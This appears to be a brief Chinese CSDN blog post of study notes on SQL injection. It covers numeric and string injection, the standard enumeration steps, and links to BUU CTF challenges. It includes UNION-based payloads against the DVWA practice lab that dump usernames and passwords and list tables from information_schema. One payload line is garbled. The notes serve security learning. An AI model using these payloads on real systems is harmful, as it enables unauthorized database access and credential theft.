SQL注入

落魚京

于 2020-12-30 10:25:08 发布

阅读量1.1k

点赞数 1

分类专栏：网络安全 web 文章标签： sql web

本文链接：https://blog.csdn.net/m0_50967960/article/details/111944318

版权

9 篇文章 0 订阅

订阅专栏

6 篇文章 1 订阅

订阅专栏

类型
1.数字型注入
2.字符型注入
区别：字符型注入需要闭合单引号“ ’ ”，数字型不需要
SQL注入基本步骤

1)判断是否存在注入，注人是字符型还是数字型。
2)猜解SQL查询语句中的字段数及字段顺序。
3)获取当前数据库名。
4)获取数据库中的表名。
5)获取表中的字段名。
6)下载数据。

DVWA

low安全级别

获取user及password
'union select user,password from users
尝试获取数据库名
'union select user(),database()
尝试获取数据库表名
'union select 1，group_concat(table_name) from information_schema.tables where table_schema=database() #
猜测密码和用户名字段
union select， pwd from admin(假如上一步返回表明为admin)（若无回显，则更改pwd，重新猜测密码字段）
经查看低安全的服务器端代码可以发现->
程序对来自客户端的参数id没有进行任何检查和过滤

buu
BUU SQL COURSE 1
https://blog.csdn.net/CyhDl666/article/details/114688676
[SUCTF 2019]EasySQL 1

关注

专栏目录